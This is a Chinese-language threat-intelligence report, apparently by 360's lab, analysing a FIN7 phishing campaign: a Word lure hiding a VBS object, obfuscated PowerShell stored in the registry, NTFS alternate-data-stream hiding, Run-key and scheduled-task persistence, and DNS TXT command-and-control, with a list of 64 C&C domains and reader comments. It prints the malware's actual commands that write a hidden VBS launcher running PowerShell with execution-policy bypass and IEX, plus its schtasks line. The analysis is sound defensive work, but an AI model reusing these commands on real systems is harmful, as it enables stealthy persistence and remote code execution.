事件背景
2017年3月,FireEye釋出了一篇名黑客組織FIN7的APT攻擊簡報,報告稱FIN7組織以釣魚郵件為攻擊管道,主要對美國金融機構滲透攻擊。組織的攻擊利用DNS協定的TXT字段進行C&C通信。360威脅情報中心對此APT組織的攻擊鍊條進行了梳理,對木馬相關的技術進行了分析,揭示其一些有意思的技巧。
目标樣本
| Hash | d04b6410dddee19adec75f597c52e386 |
|---|---|
| 檔案類型 | Word文檔 |
| 檔案大小 | 1,834,496位元組 |
攻擊特點與攻擊流程
FIN7攻擊特點主要展現在:
1. 全部攻擊過程使用非PE實作,釣魚使用doc檔案,後門使用powershell檔案。
2. 使用ADS資料隐藏儲存在磁盤中的非PE檔案
3. 後門檔案儲存在系統資料庫中,功能由Powershell實作
4. 與C&C通信使用DNS協定的TXT記錄
5. C&C位址從64個寫死的位址中随機選擇
攻擊流程:
在整個攻擊過程中,沒有使用到PE檔案,這在一定程度上躲避了安全軟體的清除。落地的檔案也進行了技術上的隐藏,而真正的後門程式卻已加密的方式存儲在系統資料庫中。
攻擊者以釣魚郵件為進入管道,在惡意文檔中嵌入vbs腳本,vbs腳本運作後解密後門程式寫入系統資料庫中,同時将調用後門程式的腳本以ads隐藏在磁盤檔案中。在後門運作後,使用DNS TXT做為C&C通信方式。
樣本分析
釣魚郵件打開後,顯示如下圖所示,可以看到,文檔中插入了一張圖檔,圖檔字型顯示模糊。
通過分析,得到了釣魚文檔的制作過程:分别插入了一個vbs的OLE對象與一張字迹模糊的圖檔,将OLE對象的圖示設定為透明圖示并置入圖檔對象的頂層,最将兩個對象組合到一起,這樣就達到了輕按兩下圖檔,實際上運作了vbs腳本的目的。
輕按兩下圖檔,就會打開vbs腳本,隻有當使用者點選彈出的對話框中的确定後,才會運作vbs腳本,如果在這時,使用者點選了取消,就可以阻斷這次攻擊。
為了誘導使用者輕按兩下圖檔運作vbs腳本,文檔中還寫入“This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below.”(文檔被Microsoft Office 保護,請啟用編輯并輕按兩下下面的圖檔)。
VBS功能:
當上面的圖檔被輕按兩下運作後,程式背景會運作VBS腳本,該腳本功能為:調用powershell解密一大段字元,從代碼中可以看出,解密出來的為一gz檔案,是以可以将這大段base64解密後,儲存成gz格式,使用解壓工具得到壓縮檔案繼續分析。
樣本加載感染過程:
gz中的檔案也是一個powershell腳本。腳本經過混淆,實作的功能是:判斷目前使用者是不是administartor權限,根據不同的權限寫入不同的系統資料庫内容,這些内容為開機後會解密執行的代碼,随後通過ADS将加載系統資料庫内容的vbs腳本寫入C:\ProgramData\windows :CtxDnsClient.vbs檔案中,并将該檔案加入啟動項和計劃任務中。
原始的powershell内容,可以看到powershell腳本經過了混淆:
後門程式寫入系統資料庫
Powershell寫入到系統資料庫中的後門程式的内容如下:
ADS隐藏磁盤檔案
将要實作開機啟動的檔案寫入到磁盤檔案C:\ProgramData\Windows:CtxDnsClient.vbs中。
對于Windows:CtxDnsClient.vbs檔案,使用了ADS資料隐藏技術。而通過ADS隐藏的資料在Windows系統中無法顯示,檔案大小也顯示為0位元組:
但是使用dir /r指令,可以看到ADS中有隐藏的資料
啟動項中的隐藏的ads資料,dump出來後顯示如下:
使用 ADS中隐藏資料内容為:
cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs"
cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass -C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"", >> C:\ProgramData\Windows:CtxDnsClient.vbs"
添加開機啟動
建立的啟動項,啟動項位置為HKCU\Software\Microsoft\Windows\CurrentVersion\Run\:
添加計劃任務:
schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i
通過上面這些過程,來實作程式的自啟動。在系統重新啟動後,啟動項中的wscript.exe會加載Windows:CtxDnsClient.vbs, Windows:CtxDnsClient.vbs中會使用powershell加載HKCU\Software\Microsoft\Windows \Part内容,part中實作的功能會加載系統資料庫相同位置下的CtxDnsClient的内容。這裡的内容就是真正的實作CC的功能。
C&C通信功能
這部分功能主要在系統資料庫中的HKCU\Software\Microsoft\Windows下 CtxDnsClient的内容中,主要功能為:從内置的64個域名中随機選擇一個,查詢該域名的SPF記錄,用來實作自己的C&C通信。
建立名為”SourceFireSux”的互斥體,防止程式重複運作:
編碼過的64個域名位址代碼片段:
從這64個域名中,随機選取一個(如這裡随機被選擇到的為:pbbk.us),加上www字首,查詢對應DNS TXT記錄内容(即查詢www.pbbk.us的dns txt記錄)。
如果傳回的内容為idle,則程式睡眠3.5秒到5.4秒的随機時間。
如果傳回的内容為www,則表明這個域名現在正在攻擊者控制之中,随後查詢mail.pbbk.us的dns txt記錄。
随後mail.pbbk.us傳回的内容就被 powershell直接通過IEX調用執行。
IOC
木馬嘗試通信的C&C位址:
| 域名 | 注冊人 | 注冊時間 | 備注 |
|---|---|---|---|
| www.grij.us | Frank Walters | 2017/2/19 3:09 | |
| www.kwoe.us | Frank Walters | 2017/2/19 3:09 | |
| www.zugh.us | Frank Walters | 2017/2/19 3:09 | |
| www.pafk.us | Frank Walters | 2017/2/19 3:09 | |
| www.cuuo.us | Frank Walters | 2017/2/19 3:07 | |
| www.ooyh.us | Frank Walters | 2017/2/19 3:07 | |
| www.vxqt.us | Frank Walters | 2017/2/19 3:06 | |
| www.cgqy.us | Frank Walters | 2017/2/19 3:07 | |
| www.wfsv.us | Frank Walters | 2017/2/19 3:07 | |
| www.palj.us | Frank Walters | 2017/2/19 3:09 | |
| www.idjb.us | Frank Walters | 2017/2/19 3:09 | |
| www.zjav.us | Frank Walters | 2017/2/19 3:09 | |
| www.mewt.us | Frank Walters | 2017/2/19 3:06 | |
| www.vkpo.us | Frank Walters | 2017/2/19 3:07 | |
| www.wqiy.info | WhoisGuard Protected | 2017/2/18 19:08 | |
| www.wvzu.pw | WhoisGuard Protected | 2017/2/18 0:00 | |
| www.gxhp.top | WhoisGuard Protected | 2017/2/18 19:07 | |
| www.hvzr.info | WhoisGuard Protected | 2017/2/18 19:07 | |
| www.reld.info | WhoisGuard Protected | 2017/2/18 0:00 | |
| www.vqba.info | WhoisGuard Protected | 2017/2/18 19:06 | |
| www.oxrp.info | WhoisGuard Protected | 2017/2/18 19:08 | |
| www.dvso.pw | WhoisGuard Protected | 2017/2/18 0:00 | |
| www.bvyv.club | |||
| www.bwuk.club | |||
| www.cihr.site | |||
| www.coec.club | |||
| www.oyaw.club | |||
| www.pbbk.us | |||
| www.ppdx.pw | |||
| www.pvze.club | |||
| www.qefg.info | |||
| www.qlpa.club | |||
| www.ueox.club | |||
| www.ufyb.club | |||
| www.dbxa.pw | |||
| www.eady.club | |||
| www.enuv.club | |||
| www.eter.pw | |||
| www.utca.site | |||
| www.vdfe.site | |||
| www.vjro.club | |||
| www.fbjz.pw | |||
| www.fhyi.club | |||
| www.futh.pw | |||
| www.gnoa.pw | |||
| www.vwcq.us | |||
| www.jimw.club | |||
| www.jomp.site | |||
| www.jxhv.site | |||
| www.kshv.site | |||
| www.ysxy.pw | |||
| www.zmyo.club | |||
| www.zody.pw | |||
| www.lhlv.club | |||
| www.lnoy.site | |||
| www.lvrm.pw | |||
| www.mfka.pw | |||
| www.nxpu.site | |||
| www.oaax.site | |||
| www.odyr.us | |||
| www.oknz.club | |||
| www.ooep.pw | |||
| www.ckwl.pw | Lin Shi Mo Ban | 2015/11/11 0:00 | 不能作為IOC |
| www.zcnt.pw | Lin Shi Mo Ban | 2015/11/16 0:00 | 不能作為IOC |
參考連結
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
*本文作者:360天眼實驗室,轉載請注明來自FreeBuf.COM
360天眼實驗室 22 篇文章 等級: 5級 | |
- 上一篇:40個安全專家需要知道的網絡安全資料
- 下一篇: 看我如何在賽門鐵克郵件安全網關上實作弱密碼到RCE漏洞執行
發表評論
已有 3 條評論
-
FIN7 APT組織攻擊木馬分析報告 在座的都是辣雞 2017-06-19 回複 1樓
RUN下加啟動殺毒不管?這不科學
亮了( 2)
-
FIN7 APT組織攻擊木馬分析報告 langyajiekou (6級) 2017-06-19 回複
@ 在座的都是辣雞 360會管,Symantec不管
亮了( 2)
-
-
FIN7 APT組織攻擊木馬分析報告 xxxx 2017-06-19 回複 2樓
ADS隐藏磁盤檔案這個怎麼做到的